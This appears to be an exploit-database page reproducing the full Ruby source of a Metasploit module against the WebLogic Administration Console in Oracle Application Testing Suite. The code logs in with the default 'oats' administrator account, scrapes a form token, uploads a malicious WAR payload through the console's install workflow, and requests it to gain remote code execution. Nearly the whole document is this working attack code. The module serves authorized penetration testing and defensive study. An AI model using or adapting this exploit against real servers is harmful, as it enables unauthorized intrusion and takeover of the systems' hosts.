Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)

2019-05-29
ID: 101559
CVE: None
Download vulnerable application: None
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',
      'Description'    => %q{
        This module abuses a feature in WebLogic Server's Administration Console to install
        a malicious Java application in order to gain remote code execution. Authentication
        is required, however by default, Oracle ships with a "oats" account that you could
        log in with, which grants you administrator access.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Steven Seeley', # Used the trick and told me about it
          'sinn3r'         # Metasploit module
        ],
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'WebLogic Server Administration Console 12 or prior', { } ]
        ],
      'References'     =>
        [
          # The CVE description matches what this exploit is doing, but it was for version
          # 9.0 and 9.1. We are not super sure whether this is the right CVE or not.
          # ['CVE', '2007-2699']
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 8088
        },
      'Notes'          =>
        {
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 13 2019',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),
        OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']),
        OptString.new('OATSPASSWORD', [true, 'The password for the admin console'])
      ])

    register_advanced_options(
      [
        OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS'])
      ])
  end

  class LoginSpec
    attr_accessor :admin_console_session
  end

  def login_spec
    @login_spec ||= LoginSpec.new
  end

  class OatsWarPayload < MetasploitModule
    attr_reader :name
    attr_reader :war

    def initialize(payload)
      @name = [Faker::App.name, Rex::Text.rand_name].sample
      @war = payload.encoded_war(app_name: name).to_s
    end
  end

  def default_oats_path
    datastore['DefaultOatsPath']
  end

  def war_payload
    @war_payload ||= OatsWarPayload.new(payload)
  end

  def set_frsc
    value = get_deploy_frsc
    @frsc = value
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
    })

    if res && res.body.include?('Oracle WebLogic Server Administration Console')
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def set_admin_console_session(res)
    cookie = res.get_cookies
    admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first
    vprint_status("Token for console session is: #{admin_console_session}")
    login_spec.admin_console_session = admin_console_session
  end

  def is_logged_in?(res)
    html = res.get_html_document
    a_element = html.at('a')
    if a_element.respond_to?(:attributes) && a_element.attributes['href']
      link = a_element.attributes['href'].value
      return URI(link).request_uri == '/console'
    end

    false
  end

  def do_login
    uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri
    })

    fail_with(Failure::Unknown, 'No response from server') unless res
    set_admin_console_session(res)

    uri = normalize_uri(target_uri.path, 'console', 'j_security_check')
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => uri,
      'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_post' =>
        {
          'j_username'           => datastore['OATSUSERNAME'],
          'j_password'           => datastore['OATSPASSWORD'],
          'j_character_encoding' => 'UTF-8'
        }
    })

    fail_with(Failure::Unknown, 'No response while trying to log in') unless res
    fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)
    store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])
    set_admin_console_session(res)
  end

  def get_deploy_frsc
    # First we are just going through the pages in a specific order to get the FRSC value
    # we need to prepare uploading the WAR file.
    res = nil
    requests =
      [
        { path: 'console/', vars: {} },
        { path: 'console/console.portal', vars: {'_nfpb'=>"true"} },
        { path: 'console/console.portal', vars: {'_nfpb'=>"true", '_pageLabel' => 'HomePage1'} }
      ]

    requests.each do |req|
      res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(target_uri.path, req[:path]),
        'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
        'vars_get' => req[:vars]
      })

      fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res
    end

    html = res.get_html_document
    hidden_input = html.at('input[@name="ChangeManagerPortletfrsc"]')
    frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil
    frsc_attr ? frsc_attr.value : ''
  end

  def do_select_upload_action
    action = '/com/bea/console/actions/app/install/selectUploadApp'
    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload')
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'    => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get'  =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortletselectedAppPath' => app_path,
          'AppApplicationInstallPortletfrsc' => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
  end

  def do_upload_app_action
    action = '/com/bea/console/actions/app/install/uploadApp'
    ctype = 'application/octet-stream'
    app_cname = 'AppApplicationInstallPortletuploadAppPath'
    plan_cname = 'AppApplicationInstallPortletuploadPlanPath'
    frsc_cname = 'AppApplicationInstallPortletfrsc'
    war = war_payload.war
    war_name = war_payload.name
    post_data = Rex::MIME::Message.new
    post_data.add_part(war, ctype, 'binary', "form-data; name=\"#{app_cname}\"; filename=\"#{war_name}.war\"")
    post_data.add_part('', ctype, nil, "form-data; name=\"#{plan_cname}\"; filename=\"\"")
    post_data.add_part(frsc, nil, nil, "form-data; name=\"#{frsc_cname}\"")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
       'ctype'   => "multipart/form-data; boundary=#{post_data.bound}",
       'data'    => post_data.to_s
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)
  end

  def do_app_select_action
    action = '/com/bea/console/actions/app/install/appSelected'
    war_name = war_payload.name
    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortletselectedAppPath' => app_path,
          'AppApplicationInstallPortletfrsc'            => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)
  end

  def do_style_select_action
    action = '/com/bea/console/actions/app/install/targetStyleSelected'

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortlettargetStyle' => 'Application',
          'AppApplicationInstallPortletfrsc'        => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
  end

  def do_finish_action
    action = '/com/bea/console/actions/app/install/finish'

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationInstallPortlet_actionOverride' => action
        },
      'vars_post' =>
        {
          'AppApplicationInstallPortletname'             => war_payload.name,
          'AppApplicationInstallPortletsecurityModel'    => 'DDOnly',
          'AppApplicationInstallPortletstagingStyle'     => 'Default',
          'AppApplicationInstallPortletplanStagingStyle' => 'Default',
          'AppApplicationInstallPortletfrsc'             => frsc
        }
    })

    fail_with(Failure::Unknown, "No response from #{action}") unless res
    print_response_message(res)

    # 302 is a good enough indicator of a successful upload, otherwise
    # the server would actually return a 200 with an error message.
    res.code == 302
  end

  def print_response_message(res)
    html = res.get_html_document
    message_div = html.at('div[@class="message"]')
    if message_div
      msg = message_div.at('span').text
      print_status("Server replies: #{msg.inspect}")
    end
  end

  def deploy_war
    set_frsc
    print_status("FRSC value: #{frsc}")
    do_select_upload_action
    do_upload_app_action
    do_app_select_action
    do_style_select_action
    do_finish_action
  end

  def goto_war(name)
    print_good("Operation \"#{name}\" is a go!")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, name)
    })

    print_status("Code #{res.code} on \"#{name}\" request") if res
  end

  def undeploy_war
    war_name = war_payload.name
    handle = 'com.bea.console.handles.JMXHandle("com.bea:Name=oats,Type=Domain")'
    contents = %Q|com.bea.console.handles.AppDeploymentHandle("com.bea:Name=#{war_name},Type=AppDeployment")|
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
      'vars_get' =>
        {
          'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage',
          'AppDeploymentsControlPortlethandle' => handle
        },
      'vars_post' =>
        {
          # For some reason, the value given to the server is escapped twice.
          # The Metasploit API should do it at least once.
          'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents),
          '_pageLabel' => 'AppApplicationUninstallPage',
          '_nfpb'      => 'true',
          'AppApplicationUninstallPortletfrsc' => frsc
        }
    })

    if res && res.code == 302
      print_good("Successfully undeployed #{war_name}.war")
    else
      print_warning("Unable to successfully undeploy #{war_name}.war")
      print_warning('You may want to do so manually.')
    end
  end

  def cleanup
    undeploy_war if is_cleanup_ready
    super
  end

  def setup
    @is_cleanup_ready = false
    super
  end

  def exploit
    unless check == Exploit::CheckCode::Detected
      print_status('Target does not have the login page we are looking for.')
      return
    end

    do_login
    print_good("Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}")
    print_status("Ready for war. Codename \"#{war_payload.name}\" at #{war_payload.war.length} bytes")
    result = deploy_war
    if result
      @is_cleanup_ready = true
      goto_war(war_payload.name)
    end
  end

  attr_reader :frsc
  attr_reader :is_cleanup_ready
end
1.3.0 (www01)